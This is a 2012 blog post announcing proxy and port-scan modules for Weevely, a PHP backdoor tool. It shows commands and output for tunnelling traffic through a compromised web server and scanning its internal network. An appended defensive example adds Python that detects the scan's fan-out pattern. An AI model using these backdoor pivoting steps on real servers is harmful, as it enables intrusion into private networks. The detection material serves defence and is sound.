Weevely as HTTP proxy and port scanner

2012-05-11 19:20:40 » hacking, networking, pentesting, php, pivoting, portscan, proxy, security, Weevely

I've added suggestive modules to Weevely to interact with remote networks.

net.proxy

The proxy module runs a local HTTP proxy that tunnels your traffic through the target web server. By default, it spawns the proxy locally on port 8080. By setting http://localhost:8080 as the proxy in your favourite browser, you anonymize your traffic and can pivot toward private networks accessible from the web server.

user@local$ ./weevely.py http://www.target.com/weev.php password :net.proxy

Weevely 0.6 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012

[net.proxy] PHP proxy uploaded as 'http://www.target.com/weepro.php'
[net.proxy] Next times skip install running ':net.proxy rurl=http://www.target.com/weepro.php'
[net.proxy] Proxy running. Set 'http://127.0.0.1:8080' as HTTP proxy

Use :show net.proxy to show all configurable options.

net.scan

The scan module performs a simple port scan through the remote web server. The host entry supports different formats: a single host (e.g. www.google.it), a single IP (e.g. 138.128.2.48), an IP range (e.g. 138.128.2.0-138.128.2.255), a network (e.g. 138.128.2.48/24), or an interface (e.g. eth3). Ports can be a single port (e.g. 80) or multiple ones (e.g. 0-1024).

This function is really useful for scanning the internal network and then connecting to the hosts found there using net.proxy as a pivot.

Usage example:

user@local$ ./weevely.py http://www.target.com/weev.php password :net.scan eth9 80

Weevely 0.6 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012

[net.scan] Scanning 1 ports of 256 hosts using 26 requests (10 connections per request)
..........
OPEN: 139.128.3.9:80
..........
..........
..........
..........
..........
..........
OPEN: 139.128.3.77:80
..........

Use :show net.scan to show all configurable options. To get information about remote network interfaces and their network addresses, use the new module :net.ifaces.
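
A defender-side view of the net.scan run above, as an added example that is not part of the original post or of Weevely: the scan shown makes the web server open connections to 256 hosts on one port in 26 bursts, which shows up in flow records as one source fanning out to many destinations. The addresses, the (timestamp, src, dst, port) record layout, the 60-second window and the 20-host threshold are assumptions chosen for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

WINDOW = timedelta(seconds=60)   # assumed sliding window
MIN_DISTINCT_HOSTS = 20          # assumed alert threshold

def sample_flows(web_server="10.0.0.5"):
    """Constructed flow records: (timestamp, src, dst, dst_port)."""
    t0 = datetime(2012, 5, 11, 19, 0, 0)
    flows = []
    # Normal behaviour: the web server talks to one database host repeatedly.
    for i in range(30):
        flows.append((t0 + timedelta(seconds=i), web_server, "10.0.0.20", 3306))
    # Scan-like behaviour: 256 hosts, one port, 10 connections per burst,
    # one burst per second (26 bursts, as in the output above).
    for n, host in enumerate(ipaddress.ip_network("10.0.1.0/24")):
        flows.append((t0 + timedelta(seconds=n // 10), web_server, str(host), 80))
    return flows

def detect_fanout(flows, window=WINDOW, min_hosts=MIN_DISTINCT_HOSTS):
    """Return {(src, port): peak distinct destinations within any window}
    for every source/port pair whose peak reaches min_hosts."""
    by_key = defaultdict(list)
    for ts, src, dst, port in sorted(flows):
        by_key[(src, port)].append((ts, dst))
    alerts = {}
    for key, events in by_key.items():
        start, counts, peak = 0, defaultdict(int), 0
        for ts, dst in events:
            counts[dst] += 1
            # Drop events that have slid out of the window.
            while ts - events[start][0] > window:
                old = events[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            peak = max(peak, len(counts))
        if peak >= min_hosts:
            alerts[key] = peak
    return alerts

if __name__ == "__main__":
    for (src, port), hosts in detect_fanout(sample_flows()).items():
        print(f"ALERT {src} contacted {hosts} distinct hosts on port {port}")
```

A web server normally accepts connections rather than initiating them toward whole subnets, so an egress rule restricting it to the few backends it needs removes this pivot path as well as making the alert above nearly free of false positives.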

These modules are available in the Weevely git repository and in version 0.7.
